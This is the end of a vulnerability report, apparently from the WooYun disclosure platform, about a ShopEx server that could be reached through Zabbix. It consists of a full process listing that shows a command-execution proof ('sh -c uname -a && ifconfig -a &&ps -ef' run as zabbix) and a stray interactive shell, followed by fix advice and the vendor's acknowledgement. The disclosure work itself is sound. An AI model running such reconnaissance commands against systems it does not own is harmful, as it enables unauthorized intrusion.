root       649    99  0  2012 ?        00:00:47 [kauditd]
root      1304     1  0  2014 ?        00:00:00 /bin/sh /usr/local/mysql/bin/mysqld_safe --datadir=/usr/local/mysql/data/ --pid-file=/tmp/mysql.pid
mysql     1515  1304  5  2014 ?        14-11:51:55 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data/ --user=mysql --log-error=/usr/local/mysql/data//tsung.err --pid-file=/tmp/mysql.pid --socket=/tmp/mysql.sock --port=3306
root      1856    99  0  2012 ?        00:00:00 [kmpathd/0]
root      1857    99  0  2012 ?        00:00:00 [kmpathd/1]
root      1858    99  0  2012 ?        00:00:00 [kmpathd/2]
root      1859    99  0  2012 ?        00:00:00 [kmpathd/3]
root      1860    99  0  2012 ?        00:00:00 [kmpath_handlerd]
root      1926    99  0  2012 ?        00:00:00 [kjournald]
root      2115    99  0  2012 ?        00:05:34 [kjournald]
root      2584     1  0  2012 ?        00:01:32 /sbin/dhclient -1 -q -lf /var/lib/dhclient/dhclient-usb0.leases -pf /var/run/dhclient-usb0.pid usb0
root      2667     1  0  2012 ?        04:25:00 syslogd -m 0
root      2670     1  0  2012 ?        00:00:00 klogd -x
root      2725    99  0  2012 ?        00:00:00 [kondemand/0]
root      2726    99  0  2012 ?        00:00:00 [kondemand/1]
root      2727    99  0  2012 ?        00:00:02 [kondemand/2]
root      2728    99  0  2012 ?        00:00:03 [kondemand/3]
root      2745     1  0  2012 ?        00:11:36 irqbalance
rpc       2765     1  0  2012 ?        00:00:00 portmap
root      2798    99  0  2012 ?        00:00:00 [rpciod/0]
root      2799    99  0  2012 ?        00:00:00 [rpciod/1]
root      2800    99  0  2012 ?        00:00:00 [rpciod/2]
root      2801    99  0  2012 ?        00:00:00 [rpciod/3]
dbus      2866     1  0  2012 ?        00:07:15 dbus-daemon --system
root      2889     1  0  2012 ?        00:00:00 /usr/sbin/hcid
root      2893     1  0  2012 ?        00:00:00 /usr/sbin/sdpd
root      2924     1  0  2012 ?        00:00:00 [krfcommd]
root      2984     1  0  2012 ?        00:00:00 /usr/sbin/acpid
68        2997     1  0  2012 ?        00:00:05 hald
root      2998  2997  0  2012 ?        00:00:00 hald-runner
68        3006  2998  0  2012 ?        00:00:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
root      3037     1  0  2012 ?        00:00:00 /usr/bin/hidd --server
root      3148     1  0  2012 ?        00:00:00 gpm -m /dev/input/mice -t exps2
root      3163     1  0  2012 ?        00:01:15 crond
xfs       3192     1  0  2012 ?        00:00:00 xfs -droppriv -daemon
root      3217     1  0  2012 ?        00:00:00 /usr/sbin/atd
root      3272     1  0  2012 ?        00:00:00 /usr/sbin/smartd -q never
root      3275     1  0  2012 tty1     00:00:00 /sbin/mingetty tty1
root      3276     1  0  2012 tty2     00:00:00 /sbin/mingetty tty2
root      3277     1  0  2012 tty3     00:00:00 /sbin/mingetty tty3
root      3280     1  0  2012 tty4     00:00:00 /sbin/mingetty tty4
root      3281     1  0  2012 tty5     00:00:00 /sbin/mingetty tty5
root      3286     1  0  2012 tty6     00:00:00 /sbin/mingetty tty6
root      3331     1  0  2012 ?        00:39:34 /usr/bin/python -tt /usr/sbin/yum-updatesd
root      3333     1  0  2012 ?        00:00:07 /usr/libexec/gam_server
root      7190 20289  1 22:04 ?        00:00:04 sendmail: ./t0J94UmK006337 from queue
root      7265  3163  0 22:09 ?        00:00:00 crond
root      7266  7265  0 22:09 ?        00:00:00 [ntpdate] <defunct>
root      7267  7265  0 22:09 ?        00:00:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem -oi -t
root      7270     1  0 22:09 ?        00:00:00 sendmail: ./t0KE95BR007268 man001.localdomain.: user open
zabbix    7272   316  0 22:09 ?        00:00:00 sh -c uname -a && ifconfig -a &&ps -ef
zabbix    7275  7272  0 22:09 ?        00:00:00 ps -ef
root      8886     1  0  2014 ?        00:00:00 SCREEN -S awstats
root      8887  8886  0  2014 pts/4    00:00:00 /bin/bash
zabbix   13537     1  0  2014 ?        00:00:00 /bin/sh -i
root     16102    99  0  2014 ?        00:01:46 [pdflush]
root     16851     1  0  2012 ?        00:00:00 /sbin/udevd -d
www      19090 26259  0 04:05 ?        00:00:00 nginx: worker process                                          
www      19091 26259  0 04:05 ?        00:00:00 nginx: worker process                                          
www      19092 26259  0 04:05 ?        00:00:00 nginx: worker process                                          
www      19098 26259  0 04:05 ?        00:00:00 nginx: worker process                                          
zabbix   19913     1  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_agentd
zabbix   19914 19913  0  2014 ?        00:00:48 /usr/local/zabbix2/sbin/zabbix_agentd
zabbix   19915 19913  0  2014 ?        00:10:00 /usr/local/zabbix2/sbin/zabbix_agentd
zabbix   19916 19913  0  2014 ?        00:09:53 /usr/local/zabbix2/sbin/zabbix_agentd
zabbix   19918 19913  0  2014 ?        00:10:00 /usr/local/zabbix2/sbin/zabbix_agentd
root     20289     1  0  2012 ?        00:15:05 sendmail: accepting connections
smmsp    20297     1  0  2012 ?        00:00:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
root     20338     1  0  2012 ?        01:19:29 auditd
root     20340 20338  0  2012 ?        00:08:56 /sbin/audispd
root     20587     1  0  2012 ?        00:10:08 /usr/sbin/sshd
root     20613     1  0  2012 ?        00:03:27 pcscd
root     20682     1  0  2012 ?        00:00:00 rpc.idmapd
rpcuser  20735     1  0  2012 ?        00:00:00 rpc.statd
root     20952     1  0  2012 ?        00:00:05 automount
root     20990     1  0  2012 ?        00:00:00 cupsd
avahi    21064     1  0  2012 ?        00:00:03 avahi-daemon: running [lenovo-man001.local]
avahi    21065 21064  0  2012 ?        00:00:00 avahi-daemon: chroot helper
root     21444     1  0  2012 ?        00:00:00 /usr/local/lib/erlang/erts-5.7.2/bin/epmd -daemon
root     26259     1  0  2014 ?        00:00:01 nginx: master process /usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
www      27821     1  0  2012 ?        00:00:02 /usr/local/memcached/bin/memcached -d -m 64 -uwww -p 11211
root     28668    99  0  2014 ?        00:01:01 [pdflush]
root     29312     1  0  2014 ?        00:00:06 php-fpm: master process (/usr/local/php/etc/php-fpm.conf)               
www      29313 29312  0  2014 ?        00:05:57 php-fpm: pool www                                                       
www      29314 29312  0  2014 ?        00:05:54 php-fpm: pool www                                                       
www      29315 29312  0  2014 ?        00:05:55 php-fpm: pool www                                                       
www      29316 29312  0  2014 ?        00:06:07 php-fpm: pool www                                                       
www      29317 29312  0  2014 ?        00:06:06 php-fpm: pool www                                                       
www      29318 29312  0  2014 ?        00:05:58 php-fpm: pool www                                                       
www      29319 29312  0  2014 ?        00:05:48 php-fpm: pool www                                                       
www      29320 29312  0  2014 ?        00:05:51 php-fpm: pool www                                                       
www      29321 29312  0  2014 ?        00:05:58 php-fpm: pool www                                                       
www      29322 29312  0  2014 ?        00:05:52 php-fpm: pool www                                                       
www      29323 29312  0  2014 ?        00:06:01 php-fpm: pool www                                                       
www      29324 29312  0  2014 ?        00:05:48 php-fpm: pool www                                                       
www      29325 29312  0  2014 ?        00:05:52 php-fpm: pool www                                                       
www      29326 29312  0  2014 ?        00:06:04 php-fpm: pool www                                                       
www      29327 29312  0  2014 ?        00:05:51 php-fpm: pool www                                                       
www      29328 29312  0  2014 ?        00:05:58 php-fpm: pool www                                                       
www      29329 29312  0  2014 ?        00:05:55 php-fpm: pool www                                                       
www      29330 29312  0  2014 ?        00:06:01 php-fpm: pool www                                                       
www      29331 29312  0  2014 ?        00:05:46 php-fpm: pool www                                                       
www      29332 29312  0  2014 ?        00:05:53 php-fpm: pool www                                                       
root     30862     1  0  2012 ?        01:39:45 /usr/sbin/snmpd -Lsd -Lf /dev/null -p /var/run/snmpd.pid -a
zabbix   31513     1  0  2014 ?        00:00:00 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31515 31513  0  2014 ?        00:23:36 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31516 31513  0  2014 ?        00:00:31 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31517 31513  0  2014 ?        08:59:36 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31518 31513  0  2014 ?        00:09:46 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31519 31513  0  2014 ?        00:00:49 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31520 31513  0  2014 ?        01:35:54 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31521 31513  0  2014 ?        02:15:26 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31522 31513  0  2014 ?        00:04:27 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31523 31513  0  2014 ?        00:05:55 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31524 31513  0  2014 ?        00:05:54 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31525 31513  0  2014 ?        00:05:54 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31526 31513  0  2014 ?        00:05:51 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31527 31513  0  2014 ?        00:05:53 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31529 31513  0  2014 ?        00:00:47 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31530 31513  0  2014 ?        00:00:03 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31533 31513  0  2014 ?        04:10:50 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31534 31513  0  2014 ?        00:20:52 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31535 31513  0  2014 ?        1-14:44:33 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31538 31513  0  2014 ?        00:08:15 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31542 31513  0  2014 ?        00:00:28 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31543 31513  0  2014 ?        02:13:29 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31544 31513  0  2014 ?        02:13:49 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31546 31513  0  2014 ?        02:13:37 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31548 31513  0  2014 ?        02:14:10 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31549 31513  0  2014 ?        00:02:09 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31550 31513  0  2014 ?        00:00:23 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31551 31513  0  2014 ?        00:00:33 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf

修复方案:

1.增加口令强度
2.限制访问
3.升级版本

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-01-21 09:48

厂商回复:

非常感谢您为shopex信息安全做的贡献
我们将尽快修复
非常感谢

最新状态:

暂无

漏洞评价:

评论